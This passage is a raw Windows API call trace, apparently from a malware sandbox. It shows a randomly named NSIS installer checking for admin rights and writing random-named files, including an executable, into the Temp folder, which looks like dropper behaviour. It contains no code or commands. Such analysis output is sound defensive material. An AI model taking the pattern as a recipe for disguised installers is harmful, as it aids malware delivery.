returned="yabotflkelw" [0300.739] lstrcpynW (in: lpString1=0x425f10, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0300.740] lstrcpynW (in: lpString1=0x425f10, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0300.740] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0300.740] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0300.740] lstrcpynW (in: lpString1=0x435800, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0300.740] LoadImageW (hInst=0x400000, name=0x67, type=0x1, cx=0, cy=0, fuLoad=0x8040) returned 0xc0221 [0301.281] wsprintfW (in: param_1=0x437000, param_2="%d" | out: param_1="1033") returned 4 [0301.281] lstrlenW (lpString="eyeglaemqezgqnwtoqba") returned 20 [0301.281] lstrcpynW (in: lpString1=0x429220, lpString2="eyeglaemqezgqnwtoqba Setup", iMaxLength=1024 | out: lpString1="eyeglaemqezgqnwtoqba Setup") returned="eyeglaemqezgqnwtoqba Setup" [0301.281] SetWindowTextW (hWnd=0x0, lpString="eyeglaemqezgqnwtoqba Setup") returned 0 [0301.281] lstrcpynW (in: lpString1=0x4a330c, lpString2="yabotflkelw", iMaxLength=1024 | out: lpString1="yabotflkelw") returned="yabotflkelw" [0301.281] ShowWindow (hWnd=0x0, nCmdShow=5) returned 0 [0301.281] GetSystemDirectoryW (in: lpBuffer=0x19f914, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0301.281] wsprintfW (in: param_1=0x19f93a, param_2="%s%S.dll" | out: param_1="\\RichEd20.dll") returned 13 [0301.281] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\RichEd20.dll", hFile=0x0, dwFlags=0x8) returned 0x6e480000 [0302.252] GetClassInfoW (in: hInstance=0x0, lpClassName="RichEdit20W", lpWndClass=0x4291c0 | out: lpWndClass=0x4291c0) returned 1 [0302.253] DialogBoxParamW (hInstance=0x400000, lpTemplateName=0x69, hWndParent=0x0, lpDialogFunc=0x403f64, dwInitParam=0x0) returned 0x0 [0303.022] GetDlgItem (hDlg=0x4025e, nIDDlgItem=1) returned 0x601fc [0303.022] GetDlgItem (hDlg=0x4025e, nIDDlgItem=2) returned 0x502a2 [0303.023] SetDlgItemTextW (hDlg=0x4025e, nIDDlgItem=1028, lpString="Nullsoft Install System v3.08") returned 1 [0303.023] SetClassLongW (hWnd=0x4025e, nIndex=-14, dwNewLong=786977) returned 0x0 [0303.027] lstrcpynW (in: lpString1=0x4281c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0303.027] lstrlenW (lpString="") returned 0 [0303.027] lstrcpynW (in: lpString1=0x40b5c8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0303.028] lstrcpynW (in: lpString1=0x40bdc8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0303.028] lstrcmpiW (lpString1="", lpString2="") returned 0 [0303.028] lstrcpynW (in: lpString1=0x4281c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0303.028] lstrlenW (lpString="") returned 0 [0303.028] lstrcpynW (in: lpString1=0x4ba524, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0303.028] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0303.028] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0303.028] lstrcpynW (in: lpString1=0x40adc8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0303.028] GetTickCount () returned 0xaed9c7 [0303.028] GetTempFileNameW (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpPrefixString="nsj", uUnique=0x0, lpTempFileName=0x42b000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsjd9c8.tmp")) returned 0xd9c8 [0303.031] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp" [0303.032] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned 48 [0303.032] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp" [0303.032] lstrcpynW (in: lpString1=0x425f10, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp" [0303.032] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned 48 [0303.032] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsjd9c8.tmp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a06608, ftCreationTime.dwHighDateTime=0x1d85fcb, ftLastAccessTime.dwLowDateTime=0x2a06608, ftLastAccessTime.dwHighDateTime=0x1d85fcb, ftLastWriteTime.dwLowDateTime=0x2a06608, ftLastWriteTime.dwHighDateTime=0x1d85fcb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nsjD9C8.tmp", cAlternateFileName="")) returned 0x48e8f0 [0303.033] FindClose (in: hFindFile=0x48e8f0 | out: hFindFile=0x48e8f0) returned 1 [0303.033] DeleteFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsjd9c8.tmp")) returned 1 [0303.034] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp" [0303.034] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned 48 [0303.034] lstrcpynW (in: lpString1=0x40adc8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp" [0303.035] CreateDirectoryW (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0303.035] GetLastError () returned 0xb7 [0303.035] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0303.035] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0303.035] GetLastError () returned 0xb7 [0303.035] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0303.036] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0303.036] GetLastError () returned 0xb7 [0303.036] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0303.036] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0303.036] GetLastError () returned 0xb7 [0303.036] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0303.036] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0303.036] GetLastError () returned 0xb7 [0303.036] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0303.037] GetModuleHandleA (lpModuleName="SHELL32") returned 0x75db0000 [0303.037] GetProcAddress (hModule=0x75db0000, lpProcName=0x2a8) returned 0x7605db90 [0303.037] IsUserAnAdmin () returned 1 [0303.038] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsjd9c8.tmp"), lpSecurityAttributes=0x19f0d8) returned 1 [0303.038] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp" [0303.039] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned 48 [0303.039] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp" [0303.039] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned 48 [0303.039] lstrcpynW (in: lpString1=0x438000, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp" [0303.039] lstrcpynW (in: lpString1=0x42b000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0303.040] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0303.040] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0303.040] lstrcpynW (in: lpString1=0x40adc8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0303.040] CreateDirectoryW (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0303.040] GetLastError () returned 0xb7 [0303.040] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0303.040] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0303.040] GetLastError () returned 0xb7 [0303.040] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0303.045] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0303.045] GetLastError () returned 0xb7 [0303.045] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0303.045] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0303.045] GetLastError () returned 0xb7 [0303.045] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0303.045] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0303.046] GetLastError () returned 0xb7 [0303.046] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0303.046] lstrcpynW (in: lpString1=0x436000, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0303.046] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 1 [0303.046] lstrcpynW (in: lpString1=0x40bdc8, lpString2="ptq0vlz6htg", iMaxLength=1024 | out: lpString1="ptq0vlz6htg") returned="ptq0vlz6htg" [0303.046] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0303.046] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0303.047] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0303.047] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="ptq0vlz6htg" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ptq0vlz6htg") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ptq0vlz6htg" [0303.047] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ptq0vlz6htg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ptq0vlz6htg")) returned 0xffffffff [0303.047] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ptq0vlz6htg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ptq0vlz6htg")) returned 0xffffffff [0303.047] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ptq0vlz6htg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ptq0vlz6htg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0303.048] SetFilePointer (in: hFile=0x210, lDistanceToMove=38338, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95c2 [0303.048] ReadFile (in: hFile=0x210, lpBuffer=0x19f3f0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x19f3f0*, lpNumberOfBytesRead=0x19f330*=0x4, lpOverlapped=0x0) returned 1 [0303.048] GetTickCount () returned 0xaed9d7 [0303.048] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0303.147] GetTickCount () returned 0xaeda44 [0303.147] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x4381, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x4381, lpOverlapped=0x0) returned 1 [0303.149] GetTickCount () returned 0xaeda44 [0303.149] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0303.153] GetTickCount () returned 0xaeda44 [0303.153] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x423a, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x423a, lpOverlapped=0x0) returned 1 [0303.153] GetTickCount () returned 0xaeda44 [0303.154] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0303.157] GetTickCount () returned 0xaeda44 [0303.157] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x496c, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x496c, lpOverlapped=0x0) returned 1 [0303.157] GetTickCount () returned 0xaeda44 [0303.157] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0303.161] GetTickCount () returned 0xaeda54 [0303.161] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x482e, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x482e, lpOverlapped=0x0) returned 1 [0303.165] GetTickCount () returned 0xaeda54 [0303.165] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0303.168] GetTickCount () returned 0xaeda54 [0303.168] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x5fa1, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x5fa1, lpOverlapped=0x0) returned 1 [0303.169] GetTickCount () returned 0xaeda54 [0303.169] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x600, lpOverlapped=0x0) returned 1 [0303.170] GetTickCount () returned 0xaeda54 [0303.170] MulDiv (nNumber=83456, nNumerator=100, nDenominator=83456) returned 100 [0303.170] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0303.170] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x2909, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x2909, lpOverlapped=0x0) returned 1 [0303.170] GetTickCount () returned 0xaeda54 [0303.170] MulDiv (nNumber=83456, nNumerator=100, nDenominator=83456) returned 100 [0303.170] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0303.170] SetFileTime (hFile=0x28, lpCreationTime=0x19f6b8, lpLastAccessTime=0x0, lpLastWriteTime=0x19f6b8) returned 1 [0303.171] CloseHandle (hObject=0x28) returned 1 [0303.177] lstrcpynW (in: lpString1=0x40bdc8, lpString2="efnvpl", iMaxLength=1024 | out: lpString1="efnvpl") returned="efnvpl" [0303.177] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0303.177] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0303.177] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0303.177] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="efnvpl" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl" [0303.177] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\efnvpl")) returned 0xffffffff [0303.178] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\efnvpl")) returned 0xffffffff [0303.178] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\efnvpl"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0303.178] SetFilePointer (in: hFile=0x210, lDistanceToMove=121798, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1dbc6 [0303.178] ReadFile (in: hFile=0x210, lpBuffer=0x19f3f0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x19f3f0*, lpNumberOfBytesRead=0x19f330*=0x4, lpOverlapped=0x0) returned 1 [0303.179] GetTickCount () returned 0xaeda63 [0303.179] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0xa2e, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0xa2e, lpOverlapped=0x0) returned 1 [0303.254] GetTickCount () returned 0xaedab2 [0303.254] MulDiv (nNumber=2606, nNumerator=100, nDenominator=2606) returned 100 [0303.254] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0303.254] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x1347, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x1347, lpOverlapped=0x0) returned 1 [0303.263] GetTickCount () returned 0xaedab2 [0303.263] MulDiv (nNumber=2606, nNumerator=100, nDenominator=2606) returned 100 [0303.263] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0303.263] SetFileTime (hFile=0x28, lpCreationTime=0x19f6b8, lpLastAccessTime=0x0, lpLastWriteTime=0x19f6b8) returned 1 [0303.263] CloseHandle (hObject=0x28) returned 1 [0303.265] lstrcpynW (in: lpString1=0x40bdc8, lpString2="dehbibhar.exe", iMaxLength=1024 | out: lpString1="dehbibhar.exe") returned="dehbibhar.exe" [0303.265] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0303.265] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0303.265] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0303.265] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="dehbibhar.exe" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe" [0303.265] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dehbibhar.exe")) returned 0xffffffff [0303.266] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dehbibhar.exe")) returned 0xffffffff [0303.266] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dehbibhar.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0303.266] SetFilePointer (in: hFile=0x210, lDistanceToMove=124408, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e5f8 [0303.266] ReadFile (in: hFile=0x210, lpBuffer=0x19f3f0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x19f3f0*, lpNumberOfBytesRead=0x19f330*=0x4, lpOverlapped=0x0) returned 1 [0303.266] GetTickCount () returned 0xaedab2 [0303.266] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x593, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x593, lpOverlapped=0x0) returned 1 [0303.327] GetTickCount () returned 0xaedaf0 [0303.327] MulDiv (nNumber=1427, nNumerator=100, nDenominator=1427) returned 100 [0303.327] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0303.327] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x1000, lpOverlapped=0x0) returned 1 [0303.329] GetTickCount () returned 0xaedaf0 [0303.329] MulDiv (nNumber=1427, 